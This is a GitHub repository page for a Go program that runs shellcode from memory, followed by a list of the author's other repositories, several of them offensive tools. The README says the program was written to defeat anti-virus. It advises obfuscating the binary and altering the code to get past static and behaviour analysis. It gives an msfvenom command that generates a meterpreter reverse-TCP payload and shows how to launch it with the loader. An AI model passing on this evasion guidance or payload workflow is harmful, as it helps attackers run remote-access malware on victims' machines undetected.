Stars: 757 • Rank: 59,989 (Top 2%) • Language: Go • Created over 6 years ago • Updated over 3 years ago


Repository Details

Load shellcode into a new process

shellcode

This is a program to run shellcode as its own process, entirely from memory. It was written to defeat anti-virus detection. It is now detected as VirTool:Win32/Shrine.A. Use a tool like garble to obfuscate the binary to defeat static analysis. Change the code yourself to defeat behavior analysis.

Usage

Keep in mind that only 64-bit shellcode will run in a 64-bit process. This program can't autodetect your shellcode's architecture.

Use msfvenom or metasploit to generate a bit of shellcode in hex format:

$ msfvenom -p windows/meterpreter/reverse_tcp -f hex -o rev.hex LHOST=127.0.0.1 LPORT=4444
c:\windows\temp>sc.exe <hex shellcode>

Sometimes the shellcode is larger than the limit of a command line with arguments. Try putting the whole thing in a batch script instead.

Build

Standard Go build steps apply. Set GOOS to windows and GOARCH to match your shellcode, either 386 or amd64. This program can't detect the architecture of your shellcode.

The resulting binary is a little big, 2.1M, but compresses well with UPX, to roughly 508K.

More Repositories

1. fastcoll (C++, 141 stars)
2. windows-ova: Self-Installing Windows OVA. Automate and distribute Windows as an OVA. (Shell, 111 stars)
3. rsocks: Tiny little reverse socks5 client & server (Go, 82 stars)
4. docker-kali: A Docker image for bits of Kali Linux (Shell, 29 stars)
5. twitter-lists: Auto updating archive of my Twitter lists. (Go, 15 stars)
6. docker-golang-musl: Docker container to build golang static binaries with musl instead of glibc (Shell, 13 stars)
7. jq-httpd: JSON Processor, as a Service (Go, 8 stars)
8. infect: Simple C program to backdoor ELF executables (C, 7 stars)
9. caddy-consul: consul plugin for caddy (Go, 7 stars)
10. pcd: How Appliances Should Be. (Makefile, 6 stars)
11. docker-golang: Docker image for cross compiling go with CGO for linux (desktops and Raspberry Pis), Windows, MacOS, and FreeBSD (Shell, 6 stars)
12. nodejs-openwrt: Former project for nodejs on openwrt (5 stars)
13. docker-volume-rclone: Docker volume plugin for rclone (Go, 5 stars)
14. tpb-backup (Go, 4 stars)
15. docker-jenkins (Shell, 4 stars)
16. shellload: Load shellcode into a new process, optionally under a false name. (C, 4 stars)
17. consuldock: Dynamic Consul Node/service creation based on docker containers (Go, 3 stars)
18. dargo: Deploy apps directly to docker (Go, 3 stars)
19. data-35c3-ftp: Hourly scans of the 35c3 ftp network (Shell, 3 stars)
20. dotfiles: My dotfiles (Lua, 3 stars)
21. go-pcd: API daemon and controlling program for https://github.com/brimstone/pcd (Go, 3 stars)
22. github-mirror: Github mirroring utility (Go, 3 stars)
23. pen-300: Tracking my PEN-300 progress (3 stars)
24. tiddlywiki-server (Go, 3 stars)
25. handbook: Personal handbook for pentesting/redteaming (Makefile, 3 stars)
26. bin (Shell, 2 stars)
27. nmap-diff: Simply shows the difference between two nmap scan xmls (Go, 2 stars)
28. docker-kvm: Wacky proof-of-concept for kvm in Docker (Dockerfile, 2 stars)
29. sslh: Listener that determines SSL, HTTP, SSH, or other connections on the same port (Go, 2 stars)
30. go-twitter: Just a little wrapper around github.com/dghubble/go-twitter for cli apps (Go, 2 stars)
31. packer-linux: templates for debian distros for packer (Shell, 2 stars)
32. wordle-solver (Go, 2 stars)
33. docker-postgres: postgres container image with traefik-cert support (Dockerfile, 2 stars)
34. go-dht-spider (Go, 2 stars)
35. mdcms: Super simple markdown based CMS (JavaScript, 2 stars)
36. go-vboxmanage (Go, 2 stars)
37. awk-gir (Awk, 2 stars)
38. gopherjs-framework (Go, 2 stars)
39. stars: My starred GitHub repositories (2 stars)
40. emergent-mesh: OpenWRT package for Emergent Mesh project: https://256.makerslocal.org/wiki/Emergent_Mesh (JavaScript, 2 stars)
41. learn-hacking: Learning Hacking by doing (PowerShell, 2 stars)
42. go-ldpreload: LD_PRELOAD library with Go (Go, 2 stars)
43. docker-unison: Docker container to run unison and synchronize with itself (Shell, 2 stars)
44. togglstat: Simple tool for tracking timecards with toggl (Go, 2 stars)
45. watchdock: Watchdog for Docker containers. Go and Consul version. (Go, 2 stars)
46. heardle-study-guide: I got tired of losing heardle (HCL, 2 stars)
47. meshtastic-prezo: Presentation about Meshtastic (JavaScript, 1 star)
48. data-32c3-ftp (Shell, 1 star)
49. bumps (Perl, 1 star)
50. timetracker (Shell, 1 star)
51. go-backoff: A simple backoff function for Go. (Go, 1 star)
52. cryptoclicker: An experiment with gopherjs and vecty. (Go, 1 star)
53. docker-node-red (JavaScript, 1 star)
54. peerpipe: Super simple program to connect unix pipes with peers. (Go, 1 star)
55. maintemail: Automated Maintenance Email based on ICS feed (Python, 1 star)
56. go-erc20 (Go, 1 star)
57. go-domainglass: A single pane of glass into the status of your domain. (HTML, 1 star)
58. gpd-pocket-kernel: Linux Kernel for GPD Pocket (Shell, 1 star)
59. mytter: Twitter API Compatible Server (PHP, 1 star)
60. vulnerable-vms: Vulnerable VMs (PowerShell, 1 star)
61. pocket: App that toots github stars and pocket archives (Go, 1 star)
62. metrics-agent (1 star)
63. gopherjs-asset (Go, 1 star)
64. arduino-footpedal: Arduino sketch for my footpedal (C++, 1 star)
65. storagenode-stats: Stats for your storagenode (Shell, 1 star)
66. fss: `fss` is a simple, bare bones, only-needs-a-posix-shell idempotent system provisioner. (Shell, 1 star)
67. raspi-kedei-lcd (C, 1 star)
68. docker-galera: Docker container for a MySQL server with wsrep extensions provided by Galera (Shell, 1 star)
69. post-brimstone-harden: Metasploit post modules for hardening systems. (Ruby, 1 star)
70. metasploit-modules: Just a few metasploit modules (Ruby, 1 star)
71. aoc: My Advent of Code solutions (Nim, 1 star)
72. docker-centos: Docker image for centos (Shell, 1 star)
73. slackbot: A very opinionated framework for building slackbots (Go, 1 star)
74. dstm: Manage swarm tokens, better? (Go, 1 star)
75. docker-ionic (Shell, 1 star)
76. dev: My development environment (Shell, 1 star)
77. awesome-startdown (1 star)
78. docker-caddy (Go, 1 star)
79. ipxe-iso: Reproducible ipxe ISO for reproducibly booting across networks (1 star)
80. brimstone (1 star)
81. docker-consul: Docker container for consul.io (Shell, 1 star)
82. projectbuilder: Opinionated build process. (Makefile, 1 star)
83. docker-goiardi: Docker image for goiardi (1 star)
84. jwt: A simple jwt library and utility. (Go, 1 star)
85. go-livereload: Single binary that implements a webserver, livereload server, and watches every file and directory in the current directory for changes. (Go, 1 star)
86. dmarc-report: Decipher DMARC reports (Go, 1 star)